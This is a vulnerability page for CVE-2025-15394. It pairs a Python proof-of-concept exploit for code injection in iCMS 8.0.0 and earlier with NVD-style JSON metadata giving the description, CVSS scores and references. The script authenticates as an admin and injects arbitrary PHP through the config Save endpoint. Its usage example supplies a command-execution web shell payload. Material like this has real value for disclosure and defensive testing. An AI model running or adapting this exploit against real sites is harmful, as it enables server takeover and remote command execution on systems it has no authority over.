CVE-2025-15394

import requests import sys # CVE-2025-15394 PoC - iCMS Code Injection # Target: iCMS <= 8.0.0 (ConfigAdmincp.php Save function) # Requirement: High privilege access (admin account) def exploit(target_url, username, password, payload): """ Exploit code injection in iCMS ConfigAdmincp.php Args: target_url: Base URL of the vulnerable iCMS installation username: Admin username password: Admin password payload: PHP code to inject (e.g., '<?php phpinfo(); ?>') Returns: bool: True if exploitation appears successful """ session = requests.Session() # Step 1: Authentication login_url = f"{target_url}/admincp.php?app=login" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) if response.status_code != 200: print(f"[-] Login failed - HTTP {response.status_code}") return False print(f"[+] Authentication successful") # Step 2: Inject malicious code via config parameter inject_url = f"{target_url}/admincp.php?app=config&do=save" inject_data = { 'config': payload, 'group': 'custom' } response = session.post(inject_url, data=inject_data, timeout=10) if response.status_code == 200: print(f"[+] Payload sent successfully") print(f"[+] Check {target_url}/app/config/ConfigAdmincp.php for injected code") return True else: print(f"[-] Injection failed - HTTP {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <payload>") print(f"Example: python {sys.argv[0]} http://target.com admin admin123 '<?php system($_GET["cmd"]); ?>'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] payload = sys.argv[4] exploit(target, user, pwd, payload)

{"cve": {"id": "CVE-2025-15394", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:43.570", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in iCMS up to 8.0.0. Affected is the function Save of the file app/config/ConfigAdmincp.php of the component POST Parameter Handler. The manipulation of the argument config results in code injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se detectó una vulnerabilidad en iCMS hasta 8.0.0. Afectada está la función Save del archivo app/config/ConfigAdmincp.php del componente POST Parameter Handler. La manipulación del argumento config resulta en inyección de código. El ataque puede lanzarse de forma remota. El exploit ahora es público y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:idreamsoft:icms:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.0.0", "matchCriteriaId": "943716E0-C293-4E52-AEB1-8BF3FECF9254"}]}]}], "references": [{"url": "https://note-hxlab.wetolink.com/share/QWuWZeAmzUdm", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339163", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339163", "source": "[email protected]", "tags": ["Third Party Ad ... (truncated)